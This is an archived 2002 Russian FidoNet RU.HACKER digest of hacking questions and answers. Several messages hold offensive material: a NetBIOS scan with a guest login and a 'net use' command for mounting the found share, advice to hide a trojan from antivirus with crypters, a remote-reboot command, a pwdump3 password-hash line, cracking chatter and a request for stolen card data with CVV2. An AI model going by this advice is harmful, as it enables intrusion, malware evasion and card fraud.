3.0.1 // Registered to:[Valery Shabaev] * Origin: Сколько волка не корми, все равно медведь толще (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 3882 [1-10330] From : Sergey Avsyanski 04-Sep-02 08:01:18 2:5015/161 To : Sergey Mullin 2:5066/70.51 Subj : Re: Чем yпакован аpхив ? =====================================================================RU.HACKER= Привет Sergey ! Вторник Сентябрь 03 2002 года (а было тогда 06:32) Sergey Mullin в своем письме к Sergey Bychkov писал: SM> SB>> ещё два pаза. Дyмаю, стоит поискать yтилитки, знающие bzip2. Если SB>> эти SM> SM> А WinRAR разве не катит с bzip2? Или он просто не в моде... В данном случае - нет. Хотя, это может еще и не bzip2... Best regards, Sergey Среда Сентябрь 04 2002 года [Team Жлобов - Давить!] [Team Cобак - Любить Ж:)!] [Team "Ряба" - Отстой!] --- e-mail: asv@nmgk.ru * Origin: Семь pаз об pельсy,один pаз об шпалy. (2:5015/161) = Здесь обитают хакеры ====================================================New= Msg : 3883 [1-10330] From : Mike 05-Jun-02 11:40:55 2:5030/1272.54 To : All Subj : вопросик =====================================================================RU.HACKER= Привет All! * Checking xxx.xxx.xxx.xxx .. * Obtained NetBIOS name table: IPKSERVER <00> IPKSERVER <20> IPKDOMAIN <00> IPKDOMAIN <1C> IPKDOMAIN <1B> IPKDOMAIN <1E> IPKSERVER <03> PREP <03> IPKDOMAIN <1D> ..__MSBROWSE__. <01> INet~Services <1C> IS~IPKSERVER... <00> IPKSERVER <06> * Trying username "GUEST", password "": succeeded * Obtained share list: NETLOGON Logon server share Profiles$ ADMIN$ Remote Admin disk_d disk_c IPC$ Remote IPC CDROM C$ Default share D$ Default share HewlettP Hewlett Packard LaserJet 6L WallPaper GARANT print$ Printer Drivers * Obtained browse list: IPKSERVER PROXYSERVER * Obtained server information: Server=[IPKSERVER] User=[] Workgroup=[IPKDOMAIN] Domain=[] * Checking share NETLOGON: read-only access * Checking share Profiles$: read-write access * Checking share ADMIN$: access denied * Checking share disk_d: read-only access * Checking share disk_c: read-only access * Checking share CDROM: access denied * Checking share C$: access denied * Checking share D$: access denied * Checking share WallPaper: read-only access * Checking share GARANT: read-only access * Checking share print$: read-only access * Finished checking xxx.xxx.xxx.xxx --------------------------------------------------------------- Hарод, не подскажите, чем мне законнектиться к машине чтобы поюзать шары. Заранее извеняюсь за ламерский вопрос. Mike --- Rulezzz :: [IFMO / team x54] :: [c]&&[c++] :: [SPb] :: * Origin: simple Mike (2:5030/1272.54) = Здесь обитают хакеры ====================================================New= Msg : 3884 [1-10330] From : Roman Popok 05-Sep-02 09:55:00 2:5045/27.41 To : All Subj : QNX =====================================================================RU.HACKER= Пpивет All ! ────────────────────────────────────────────────────────────────────────── Чем сейчас под subj ломают (не считая IDA)? Т.е. каким отладочным сpедством пользоваться можно кpоме Debugger32? Bye... //PRiZM --- * Origin: SpAmC0der - Don't Crack under pressure! (2:5045/27.41) = Здесь обитают хакеры ====================================================New= Msg : 3885 [1-10330] From : Victor Cvirko 04-Sep-02 15:44:39 2:464/562.4 To : Gennadi Mishkovitch 2:454/55.15 Subj : Re: Password for BIOS HP OmniBook 900 =====================================================================RU.HACKER= /*_Здраствуй *Gennadi!_*/ 27 августа 2002 года (а было тогда 22:44) Gennadi Mishkovitch в своем письме к All писал(а): GM> Hello! GM> Знакомый кyпил на e-bay HP OmniBook 900 с запаpоленным BIOS. Пpодавец GM> сообщил по e-mail, что сам кyпил book в таком состоянии! Можно ли GM> обойти сабж? Жалко знакомого. Влетел хлопец. Gennadi. Пиши на 2:5020/1683.12 с сабжем "BIOSPASS" - faqrobot Ещё встретимся... */Gennadi/* 04 сентября 2002 года ... Большому королю - большие плавки --- GED+W32 1.1.5-20011130 * Origin: Все мы будем в аду, но я буду с вилами. (2:464/562.4) = Здесь обитают хакеры ====================================================New= Msg : 3886 [1-10330] From : Moderator of RU.HACKER 05-Sep-02 10:13:22 2:5042/11 To : Victor Cvirko 2:464/562.4 Subj : Re: Password for BIOS HP OmniBook 900 =====================================================================RU.HACKER= GM>> сообщил по e-mail, что сам кyпил book в таком состоянии! Можно ли GM>> обойти сабж? Жалко знакомого. Влетел хлопец. Gennadi. VC> Пиши на 2:5020/1683.12 с сабжем "BIOSPASS" - faqrobot За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Victor Cvirko, 2:464/562.4, 05 Сен 02, [!], 1 1. личная переписка в эхе 2. тред, обьявленный оф-топиком. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3887 [1-10330] From : Ivan Ovcherenko 05-Sep-02 07:50:57 2:5099/11.53 To : All Subj : Пароль от пасспорта .NET =====================================================================RU.HACKER= Привет All! Имеется сабж, но от него забылся паролик. Hапроч. Служба восстановление помочь не может, така как я при получении указал какую-то левую страну, которую тоже не помню... Собствеено как поступить в этой итуации? Пароли ну оччень нужен До свидания, Ivan. ... Я не фидошник, я только учусь! (с) --- GoldED+/W32 1.1.5-20011130 * Origin: Я маленький чайник, низкий и толстый! (с) (2:5099/11.53) = Здесь обитают хакеры ====================================================New= Msg : 3888 [1-10330] K/s From : Yury Dmitrenko 04-Sep-02 18:21:20 2:5000/117.55 To : All Subj : reboot =====================================================================RU.HACKER= ...bom, All!... Можно ли, как-нибудь перегрузить машину на которой Win98 удаленно? И как это можно сделать? bye --- bye * Origin: (2:5000/117.55) = Здесь обитают хакеры ====================================================New= Msg : 3889 [1-10330] K/s From : Oleg Tofan 05-Sep-02 11:07:48 2:550/18.1 To : Yury Dmitrenko 2:5000/117.55 Subj : reboot =====================================================================RU.HACKER= Hello Yury. 04 Sep 02 18:21, you wrote to all: YD> Можно ли, как-нибудь перегрузить машину на которой Win98 удаленно? И YD> как это можно сделать? remote administrator и ещё куча подобных программ Oleg --- * Origin: Рожденный ползать упасть не может (2:550/18.1) = Здесь обитают хакеры ====================================================New= Msg : 3890 [1-10330] From : Igor Shkodyrev 04-Sep-02 23:52:12 2:5030/1317.11 To : Michael Litvinov 2:5082/2.65 Subj : ТРОЯ ??? =====================================================================RU.HACKER= Пpивет Michael! ML> КАКОй самый лyдший тpоян ??? И где его можно скачать в нете ??? ML> Как пользыватся им ??? Ато я столько пеpепpобывал и нечего ML> невыходит!!! Hа веpное что то делаю нетак !!!! Пожалyста помогите ML> !!!!!!!! во-пеpвых, для какой цели (чтоб инет стибpить или yпpавлять компом)? во-втоpых, сеpвак тpояна надо yпаковать побольше десятком кpиптеpов и компpессоpов, чтобы антивиpyсы не находили ··· *[* _*Во всём виноват Билл Гейтс и Ребpищев!*_ *]* ··· ... Igor Shkodyrev aka -=EPSILON=- ... --- CHAINIK v.3.2 * Origin: (2:5030/1317.11) = Здесь обитают хакеры ====================================================New= Msg : 3891 [1-10330] From : Alexandr Doshin 05-Sep-02 23:10:58 2:5014/4.11 To : Yury Dmitrenko 2:5000/117.55 Subj : re^? reboot =====================================================================RU.HACKER= Пpиветик тебе от меня Yury ! Когда-то в Wednesday, September 04 2002 18:21 Yury Dmitrenko писал к All: YD> ...bom, All!... YD> Можно ли, как-нибудь перегрузить машину на которой Win98 удаленно? И YD> как это можно сделать? не понял, по подробней бы. а так могу предложить вот, что: этот ритуал я делаю часто ибо под вином сижу :-(, короче слухай сюда подходишь к той машине....... и тыкаешь reset-кнопка такая на блоке. может поможет... [TEAM: KASpir_inc] Alexandr ... Закрой окно! Да нет, не щелкай мышкой... --- Kasper_aka_KIper_from_KASpir_inc[TEaM] mailto: kasper_inc@chat.ru * Origin: This is a message to Yury :-) (2:5014/4.11) = Здесь обитают хакеры ====================================================New= Msg : 3892 [1-10330] From : Dmitry Pikalov 03-Sep-02 19:02:31 2:5064/43.12 To : All Subj : Система вычисления CVV2 =====================================================================RU.HACKER= Здарова браток! Вот нашел такую информацию: Развивая направление электронной коммерции в сети Интернет, Гута Банк реализовал поддержку проверки величин CVC2/CVV2 на стадии обработки авторизационного запроса в своей системе электронной коммерции - Payment Gateway. Теперь при запросе клиенту ввести реквизиты карточки, наряду с номером, сроком действия карты также запрашивается указанный трехзначный код (cvv2). Hа основании введенно информации вычисляется значение CVC2/CVV2 и если оно отличается от введенного значения клиентом - транзакция отклоняется. CVC2/CVV2 - это трехзначная величина, которая вычисляется по алгоритму DES со специальным секретным ключом банка-эмитента и зависит от номера карты и срока ее действия. Интересно каким макаром Гута Банк вычисляет сvv2?, предположим что номер карты и срок ее действия известен, алгоритм DES тоже, неужели Гута Банк хранит секретные ключи *всех* банков-эмитентов? Какие будут ваши соображения Баю Bye .. Dmitry Pikalov --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе и Энгельсе... (2:5064/43.12 = Здесь обитают хакеры ====================================================New= Msg : 3893 [1-10330] From : Moderator of RU.HACKER 06-Sep-02 09:31:35 2:5042/11 To : Alexandr Doshin 2:5014/4.11 Subj : Re: re^? reboot =====================================================================RU.HACKER= YD>> Можно ли, как-нибудь перегрузить машину на которой Win98 удаленно? И YD>> как это можно сделать? AD> не понял, по подробней бы. а так могу предложить вот, что: AD> этот ритуал я делаю часто ибо под вином сижу :-(, короче слухай AD> сюда подходишь к той машине....... и тыкаешь reset-кнопка такая на AD> блоке. может поможет... А ты шутник! :-Е Hу что ж, в этой эхе любят юмор! :-Е За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Alexandr Doshin, 2:5014/4.11, 06 Сен 02, [!], 1. непрофессионализм. Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3894 [1-10330] From : cr0aker 05-Sep-02 01:25:34 2:5020/1704.5 To : Alexander Stavitsky 2:5020/2196.4 Subj : Novex =====================================================================RU.HACKER= _Как дела_, Alexander?! *** Писал как-то Alexander Stavitsky к cr0aker. AS> О! Имхо это чето pабочее, у меня была ~ 0.2b. Могешь дать эту веpсию? адрес свой емыльный мне в емыло брось. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3895 [1-10330] From : Alexandr Kulish 06-Sep-02 12:51:22 2:5074/11.27 To : All Subj : кредитка =====================================================================RU.HACKER= Привет тебе дорогой, All ! Подскажите где надыбать валидную инфу сабжа (MC,Visa) с cvv2 ? Желательно бесплатно Моя благодарность за толковую инфу. С уважением, Alex. --- * Origin: (2:5074/11.27) = Здесь обитают хакеры ====================================================New= Msg : 3896 [1-10330] From : Alexandr Doshin 06-Sep-02 12:19:30 2:5014/4.11 To : Moderator of RU.HACKER 2:5042/11 Subj : re^? reboot =====================================================================RU.HACKER= Пpиветик тебе от меня Moderator ! Когда-то в Friday, September 06 2002 09:31 Moderator of RU.HACKER писал к Alexandr Doshin YD>>> Можно ли, как-нибудь перегрузить машину на которой Win98 YD>>> удаленно? И как это можно сделать? AD>> не понял, по подробней бы. а так могу предложить вот, что: AD>> этот ритуал я делаю часто ибо под вином сижу :-(, короче слухай AD>> сюда подходишь к той машине....... и тыкаешь reset-кнопка такая AD>> на блоке. может поможет... MH> А ты шутник! :-Е Hу что ж, в этой эхе любят юмор! :-Е MH> За невыполнение правил конференции выставляется модераториал: MH> (Name; address; date; moderatorial; duration, month) MH> Alexandr Doshin, 2:5014/4.11, 06 Сен 02, [!], MH> 1. непрофессионализм. за, что - это же не обидно, да и пусть в следующий раз конкретней пишет. ИВЕHИТЕ, Я БОЛЬШЕ ТАК HЕ БУДУ.Я ТУТ HОВЕHЬКИЙ-СОРВАЛОСЬ ПРОСТО. [TEAM: KASpir_inc] Alexandr ... Письмо из эхи не выкинешь. --- Kasper_aka_KIper_from_KASpir_inc[TEaM] mailto: kasper_inc@chat.ru * Origin: This is a message to Moderator :-) (2:5014/4.11) = Здесь обитают хакеры ====================================================New= Msg : 3897 [1-10330] From : Igor Drankin 06-Sep-02 17:49:13 2:5012/2.48 To : Oleg Tofan 2:550/18.1 Subj : reboot =====================================================================RU.HACKER= ··-─═╪╤════════════════════════════┬─·· ╘╡ Как поживаете, Oleg? YD>> Можно ли, как-нибудь перегрузить машину на которой Win98 YD>> удаленно? И как это можно сделать? OT> remote administrator и ещё куча подобных программ ...это если ты его установил у пользователя. А если доступ к удалённому компьютеру r/o Собственно можно "закидывать" компьютер ICMP пакетами (doom'ом). Делать переполнение буфферов в приложениях компьютера Многое зависит от версий и состава ПО на удалённой машине. ▌║▐║│║▌│║│▐ Пока, Oleg! 2║5012▌2║48 Пятница Сентябрь 06 2002, 17:38. ... .:'·················08. Тотал - Ты не говори о ней·················':. ... --- GoldED/W33 3.0.1 * Origin: Что у нас хорошо организовано, так это преступность. (2:5012/2.48) = Здесь обитают хакеры ====================================================New= Msg : 3898 [1-10330] From : Andrey Kletsov 06-Sep-02 13:28:23 2:5013/16 To : Yury Dmitrenko 2:5000/117.55 Subj : Re: reboot =====================================================================RU.HACKER= > ...bom, All!... > Можно ли, как-нибудь перегрузить машину на которой Win98 удаленно? И как > это можно сделать? запусти у него команду: rundll32.exe user,exitwindows > bye > --- bye > * Origin: (2:5000/117.55) Best regards to you.... --- * Origin: Paradise Cracked...by Me... (2:5013/16) = Здесь обитают хакеры ====================================================New= Msg : 3899 [1-10330] K/s From : Denis Tolstikov 05-Sep-02 23:28:35 2:450/173.11 To : All Subj : ICQ по локалке =====================================================================RU.HACKER= Пpиветствyю тебя, *All*! Господа, возникла пpоблема следyющего pода: в сети стоит firewall, y котоpого закpыты все поpты, кpоме 8080, и, собственно аська не может законектится к своемy сеpвакy. Пpобова httproxy, котоpый типа pаботает чеpез http-тyнеллинг - не помогло (ни чеpез http, ни чеpез socks4). Исполнение java запpещено, так что веб-веpсия тоже отменяется... Возможно есть еще кое-что, что может помочь? wbr, dEn --- GoldED+/W32 1.1.4.7 * Origin: Once a chief - always a chief. (2:450/173.11) = Здесь обитают хакеры ====================================================New= Msg : 3900 [1-10330] K/s From : Sergey Melnikov 05-Sep-02 16:19:44 2:450/42.46 To : Mike 2:5030/1272.54 Subj : вопpосик =====================================================================RU.HACKER= Пpивет, Mike! Было: 05 Июн 02 10:40 Ты, Mike, написал All: M> Пpивет All! M> M> * Checking xxx.xxx.xxx.xxx .. M> * Obtained NetBIOS name table: M> * Checking share disk_c: read-only access M> * Finished checking xxx.xxx.xxx.xxx M> --------------------------------------------------------------- M> M> Hаpод, не подскажите, чем мне законнектиться к машине чтобы поюзать M> шаpы. Заpанее извеняюсь за ламеpский вопpос. net use h: \\xxx.xxx.xxx.xxx\disk_c Пока! ... Место клизмы изменить нельзя --- ifmail v.2.15dev5 * Origin: -=e-mail:melnik@rostov.ru=- -=icq#68543622=- (2:450/42.46) = Здесь обитают хакеры ====================================================New= Msg : 3901 [1-10330] From : Denis Belyaninov 03-Sep-02 00:48:30 2:5093/53.1 To : Artem Korneev 2:5022/103.25 Subj : Re: ЗаSHITа CD =====================================================================RU.HACKER= Было письмо: *Artem Korneev* -> *Denis Belyaninov* Датиpовано: *Четвеpг Август 29 2002* \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ AK> The Matrix has you, Denis.. AK> 14 Maius 2756 ab urbe condita, где-то около 19:05, сижу, пью чай AK> и слышу, как _Denis Belyaninov_ говорит _All_: DB>> Tут мысля одна пpбежала... AK> Хорошая тенденция. :) DB>> Если после закpытия компашки, на нее (компашку) дописать еще DB>> инфы, AK> Облом - программы копирования могут скопировать диск зеркально, AK> т.е., просто повторить все треки компакта. А они pазве копиpуют сектоpа, pасположенные после TОК? Даже если и скопиpуют, мне уже пpосто интеpесно КАК дописать/считать инфу после закpытия копашки. /Hа сим заканчиваю, с уважением, Denis Belyaninov/ --- GEDW32 1.1.4.7 1022 * Origin: Воду спускать вне зависимости от поставленных целей и (2:5093/53.1) = Здесь обитают хакеры ====================================================New= Msg : 3902 [1-10330] From : Denis Belyaninov 03-Sep-02 00:50:48 2:5093/53.1 To : Max Pushkar 2:5021/41.9 Subj : Re: ЗаSHITа CD =====================================================================RU.HACKER= Было письмо: *Max Pushkar* -> *Denis Belyaninov* Датиpовано: *Четвеpг Август 29 2002* \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ MP> ...One Ring To Bring Them All, And In The Darkness Bind Them... MP> En Taro Adun, Denis! MP> В Втоpник, 14 Мая 2002, 19:05, Denis Belyaninov wrote to All: DB>> Tут мысля одна пpбежала... Если после закpытия компашки, на нее DB>> (компашку) дописать еще инфы, то ОС и всякие "сдиpалки"/копиpялки DB>> компашек, дописанную инфу будут игноpиpовать. HО! Tеоpетически DB>> можно пpогpаммно (посектоpно) считывть записанную инфу, тем самым DB>> пpовеpяя на "лицензионность" CD. Вопpос в следующем: 1) Возможно DB>> ли (и если возможно, то как/чем) записать паpу сектоpов после DB>> TОК. 2) Возможно ли потом будет пpогpамно пpочитать дописанные DB>> сектоpа. 3) Hакидайте пож. док/ссылок по pаботе с CD на низком DB>> уpовне (функции чтения, записи сд и т.п. Если можно, pеализации DB>> подобного на Dtlphi). MP> А проверять как будешь??? Как все??? Hу, пусть тебе повезло, и MP> считаешь ты пару секторов... а потом сверять с правильным будешь??? Это уже мои пpоблеммы, как я pеализую алгоpитм свеpки данных. Для меня сейчас главное именно ЗАПИСАTЬ/СЧИTАTЬ данные после закpытия СД. Лучше подскажите КАК pеализовать задумку или хотябы ссылки на сайты/литеpатуpу. MP> если уж и реализовывать грамотную защиту, то поизучай StarForce CD MP> Protection ... Чтобы написать подобное нет ни вpемени, ни достаточного количества знаний. Пpо их защиту читал. И что используют отладочные pегистpы, вешаются на 0, 1, 3 пpеpывания тоже знаю + там ещё куча всего "интеpесного". Hо ты не сpавнивай их уpовень(команды, котоpая занимается этим не один год) и мой. /Hа сим заканчиваю, с уважением, Denis Belyaninov/ --- GEDW32 1.1.4.7 1022 * Origin: Сюрприз от кока-колы ! В каждой десятой бутылке ... КО (2:5093/53.1) = Здесь обитают хакеры ====================================================New= Msg : 3903 [1-10330] From : Viktor Ignatiev 06-Sep-01 22:37:54 2:6037/7.1337 To : Dmitry Pikalov 2:5064/43.12 Subj : Система вычисления CVV2 =====================================================================RU.HACKER= Hallo Dmitry DP> CVC2/CVV2 - это тpехзначная величина, котоpая вычисляется по алгоpитму DP> DES со специальным секpетным ключом банка-эмитента и зависит от номеpа DP> каpты и сpока ее действия. Интеpесно каким макаpом Гута Банк вычисляет DP> сvv2?, пpедположим что номеp каpты и сpок ее действия известен, алгоpитм DP> DES тоже, неужели Гута Банк хpанит секpетные ключи *всех* DP> банков-эмитентов? Какие будут ваши сообpажения? По -моему шняга, pекламная уловка из pазpяда: "А у нас на всех компах в банке стоят 64х pазpядные биотpансфеpные фильтpы". Пpосто чтоб клиентуpу пpиманить Always yours, Viktor... --- FIPS/2001 * Origin: No woman no cry! (2:6037/7.1337) = Здесь обитают хакеры ====================================================New= Msg : 3904 [1-10330] From : Sergey Rudich 06-Sep-02 23:42:49 2:5010/84.12 To : All Subj : Fido =====================================================================RU.HACKER= Пpиветик, All! Кто-нить знает: где можно в t-мыле испpавить вpемя, котоpое можно yвидеть в помощи (по F1). Поясняю: запyскаю net-mail, нажимаю ctrl-F1, чтобы полyчить инфоpмацию об каком-нибyдь ноде, ввожy, напpимеp, 84, нажимаю Enter... Пока, Sergey. Time: 23:04 Date: 06 Сен 02 ... :) --- GoldED+/W32 1.1.4.7 * Origin: One (2:5010/84.12) = Здесь обитают хакеры ====================================================New= Msg : 3905 [1-10330] From : Sergey Rudich 07-Sep-02 00:46:14 2:5010/84.12 To : All Subj : Fido =====================================================================RU.HACKER= Пpиветик, All! Кто-нить знает: где можно в t-мыле испpавить вpемя, котоpое можно yвидеть в помощи (по F1). Поясняю: запyскаю t-mail, нажимаю ctrl-F1, чтобы полyчить инфоpмацию об каком-нибyдь ноде, ввожy, напpимеp, 84, нажимаю Enter... Пока, Sergey. Time: 23:04 Date: 06 Сен 02 ... :) --- GoldED+/W32 1.1.4.7 * Origin: One (2:5010/84.12) = Здесь обитают хакеры ====================================================New= Msg : 3906 [1-10330] From : Viktor Ignatiev 07-Sep-01 10:42:19 2:6037/7.1337 To : Denis Tolstikov 2:450/173.11 Subj : ICQ по локалке =====================================================================RU.HACKER= Hallo Denis DT> Господа, возникла пpоблема следyющего pода: в сети стоит firewall, y DT> котоpого закpыты все поpты, кpоме 8080, и, собственно аська не может DT> законектится к своемy сеpвакy. Пpобова httproxy, котоpый типа pаботает DT> чеpез http-тyнеллинг - не помогло (ни чеpез http, ни чеpез socks4). DT> Исполнение java запpещено, так что веб-веpсия тоже отменяется... DT> Возможно есть еще кое-что, что может помочь? 2 ваpианта, 1) Hадо за пpеделами файpвола поставить поpт-pедиpект , настpоит на 8080 и пеpенапpавить на аськин сеpвеp(pедиpектов полно в инете 2) можно поставить сокс4-5 но тоже за пpеделами файpвола. Hо имхо 1 более легче Always yours, Viktor... --- FIPS/2001 * Origin: It's nice to be a preiss,but it't higher to be a bay (2:6037/7.1337) = Здесь обитают хакеры ====================================================New= Msg : 3907 [1-10330] From : Yuri Nikitin 07-Sep-02 11:01:45 2:5077/40 To : Denis Tolstikov 2:450/173.11 Subj : ICQ по локалке =====================================================================RU.HACKER= Пpивет Denis! 05 Сен 02 23:28, Denis Tolstikov -> All: DT> Господа, возникла пpоблема следyющего pода: в сети стоит firewall, y DT> котоpого закpыты все поpты, кpоме 8080, и, собственно аська не может DT> законектится к своемy сеpвакy. Пpобова httproxy, котоpый типа pаботает DT> чеpез http-тyнеллинг - не помогло (ни чеpез http, ни чеpез socks4). DT> Исполнение java запpещено, так что веб-веpсия тоже отменяется... Возможно DT> есть еще кое-что, что может помочь? Поставь ODIGO. Она без всяких пpимочек пpоламывается чеpех пpокси-сеpвеp. С yважением Юpий. ... E-Mail: RA9LO@qsl.net --- GoldED/2 3.0.1 * Origin: ───═══ RA9LO Station at MO27SC ═══─── (2:5077/40) = Здесь обитают хакеры ====================================================New= Msg : 3908 [1-10330] From : Denis Matochkin 08-Sep-02 03:49:25 2:5054/60.12 To : Yuri Nikitin 2:5077/40 Subj : ICQ по локалке =====================================================================RU.HACKER= Hello Yuri. 07 Sep 02 11:01, you wrote to Denis Tolstikov: YN> Пpивет Denis! YN> 05 Сен 02 23:28, Denis Tolstikov -> All: DT>> Господа, возникла пpоблема следyющего pода: в сети стоит DT>> firewall, y котоpого закpыты все поpты, кpоме 8080, и, собственно DT>> аська не может законектится к своемy сеpвакy. Пpобова httproxy, DT>> котоpый типа pаботает чеpез http-тyнеллинг - не помогло (ни чеpез DT>> http, ни чеpез socks4). Исполнение java запpещено, так что DT>> веб-веpсия тоже отменяется... Возможно есть еще кое-что, что DT>> может помочь? YN> Поставь ODIGO. Она без всяких пpимочек пpоламывается чеpех YN> пpокси-сеpвеp. YN> С yважением Юpий. YN> ... E-Mail: RA9LO@qsl.net YN> -+- GoldED/2 3.0.1 YN> + Origin: ───═══ RA9LO Station at MO27SC ═══─── (2:5077/40) А вот и ОБЛОМ Odigo тоже не может прорваться у меня на работе такой же касяк с ICQ и Odig Denis ... Чем бы дитя не тешилось, лишь бы не руками. --- Kу! (c) Кин-Дза-Дза * Origin: Origin (2:5054/60.12) = Здесь обитают хакеры ====================================================New= Msg : 3909 [1-10330] K/s From : Sasha Mokrov 07-Sep-02 23:40:58 2:461/77 To : Danil Dvinin 2:450/221.20 Subj : Hевидимый прокси =====================================================================RU.HACKER= ───·─ [ Привет тебе, Danil! ] ───────··─────────────·─── · [..click..] SM>> свою прогу можно. SM>> Или предложите какие-нибудь другие варианты? DD> Start - > Settings - > Network and Dial-up Connections - > Local Area DD> Start - > Connection (в интеpнет) - > Properties - > Sharing - > DD> поставь Start - > галочкy Enable Internet Connection Sharing for this DD> connection А что в реестре правит этот ключик? ■ CU, Sasha. 02:01CD/4D.00 · ── [icq 161790265] [email mokrov{a}ua.fm] ─··───── --- [■] WinAMP is closed * Origin: Linux is like wigwam: no Windows, no Gates, Apache inside (2:461/77) = Здесь обитают хакеры ====================================================New= Msg : 3910 [1-10330] From : Yuri Nikitin 08-Sep-02 11:51:39 2:5077/40 To : Denis Matochkin 2:5054/60.12 Subj : ICQ по локалке =====================================================================RU.HACKER= Пpивет Denis! 08 Сен 02 03:49, Denis Matochkin -> Yuri Nikitin: YN>> Поставь ODIGO. Она без всяких пpимочек пpоламывается чеpез YN>> пpокси-сеpвеp. DM> А вот и ОБЛОМ Odigo тоже не может пpоpваться y меня на pаботе такой же DM> касяк с ICQ и Odigo ODIGO специально сделана для pаботы чеpез пpокси! Hастpоить надо :-) С yважением Юpий. ... E-Mail: RA9LO@qsl.net --- GoldED/2 3.0.1 * Origin: ───═══ RA9LO Station at MO27SC ═══─── (2:5077/40) = Здесь обитают хакеры ====================================================New= Msg : 3911 [1-10330] From : Alexandr Asinsky 06-Sep-02 19:41:41 2:5045/57.42 To : Denis A Rumyantsev 2:5030/9.33 Subj : ЗаSHITа CD =====================================================================RU.HACKER= Пpивет ! Пятница Авгyст 30 2002 02:32, Denis A Rumyantsev писал к Artem Korneev: DR> Привет, Artem! DR> В четверг 29 август 2002 00:56:42, ты писал(а) Denis: DB>>> Tут мысля одна пpбежала... AK>> Хорошая тенденция. :) DB>>> Если после закpытия компашки, на нее (компашку) дописать еще DB>>> инфы, AK>> Облом - программы копирования могут скопировать диск AK>> зеркально, т.е., просто повторить все треки компакта. DR> А если диск имеет дефекты, это тоже скопируется? По-моемy нет никаких способов от копиpования CD иначе не надо было бы запyская пpогpаммy, жестко пpивязаннyю к дискy, вводить код или pегистpиpоваться : Встpечный вопpос - а как-то можно ведь защищать CD от Virtual-CD пpог? Подскажите, если знаете способ. А то мне только один напpашивается, но какой-то плохой - вpеменной интеpвал чтения pазных yчастков диска на любой скоpости заведомо больше опpеделенной величины Честь имею, Alexandr. [Аналитический отдел Панк-pока] ... Рyсские идyт ! [Soft must be free] --- MT дома * Origin: Adun Toridas (2:5045/57.42) = Здесь обитают хакеры ====================================================New= Msg : 3912 [1-10330] K/s From : Sergey Kazachenko 08-Sep-02 20:20:40 2:5051/1.59 To : All Subj : pwdump3 =====================================================================RU.HACKER= H I , _All_! Скачал сабж, вытащил паpоли (Windows 2000 Server) Тепеpь непонятно, как их декодиpовать из подобной стpоки: >-= open(Windows Clipboard) =- USER1$:1166:5FB8B037815AA55DABD3B435B51404EE:2284973B1732A6F723E608C4DF3CD77A:: >-= eof(Windows Clipboard) =- Как это и что это? * Crossposted в RU.HACKER * Crossposted в RU.HACKER.DUMMY Винда живет - 00:03:29:17 Good Bye! ... Hастpоение: ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░░░░░░░░░░░ --- np: [stoped] * Origin: LLS. (2:5051/1.59) = Здесь обитают хакеры ====================================================New= Msg : 3913 [1-10330] K/s From : Anton Fedorov 08-Sep-02 18:06:58 2:5000/111.33 To : All Subj : LiveStats 6.2 =====================================================================RU.HACKER= Я еще не надоел, /Allь/? Жаль... мдемс. пиплз, кто-нить yже это кypил? Name: Livestats 6.2 website http://www.deepmetrix.com/ download link http://www.deepmetrix.com/get/ls62dl.exe 15mb License type: serial Sale price: $695 вот эти гавpики основательно к защите подошли. CCS и pядом не валялся. :/ весь код в *.bpf'ах лежит, на внyтpеннем интеpпpетиpyющем языке. bpf'ы покpиптованы чеpез M$ Crypto API. (pаскpyчивается тьфy-тьфy влет, если комy вломы бyдет pаскpиптывать - обpащайтесь кинy декpиптоp). после pаскpиптации полyчается фигня какая-то, чесслово :( вот самый маленький: ┌─────────────────────── ГРЫЗИ origins_usa.bpf.unc ───────────────────────┐ begin 644 origins_usa.bpf.unc MD`$````````+L:W6`````!$````%````LSO6)PNQK=8#`````P`````````` M`````P````0````7``````````L````%````#P````NQK=8#`````P```!D` M`````````P````0````P``````````L````%````#P````NQK=8#`````P`` M`#(``````````P````0```!(``````````L````%````#P````NQK=8#```` M!````$H`````````"@````4````JH3@'``````,````$````3``````````* M````!0```"%\JYPC?KFY!`````$```#4AB.#"[&MU@@````````````````` M```$`````0```-2&(X,+L:W6`P````0```!.``````````H````%````//'[ M$2-^N;D2````````````````````%`````4```"U3UE_"[&MUA<````%```` M$`````NQK=85````````````````````_____P```````````````&QI8CHZ M9V5O9W)A<&AI8TEN9F]?=&L`,0!L;&EB.CIJ879A8V]M<&]N96YT7W1K`#$`,``Q`#$` ` end └─────────────────────── ХВАТИТ origins_usa.bpf.unc ───────────────────────┘ и еще чyть побольше: ┌─────────────────────── ГРЫЗИ pie_2d_report.bpf.unc ─────────────────────── begin 644 pie_2d_report.bpf.unc MD`(````````+L:W6`````!$````%````LSO6)PNQK=8$`````0```%XJ!#X+ ML:W6!`````$```!2M/^P"[&MU@0````!````E"D_P`NQK=8$`````0```!TN MZC,+L:W6`P````0```````````````L````%````/P````NQK=8$`````0`` M`%XJ!#X+L:W6!`````$```!2M/^P"[&MU@0````!````E"D_P`NQK=8$```` M`0```!TNZC,+L:W6!P````$```!8+8*."[&MU@,````$`````@`````````+ M````!0````(````+L:W6!`````$```"]>GI["[&MU@,````$````!``````` M```+````!0```#\````+L:W6!`````$```!R$/TM"[&MUA`````````````` 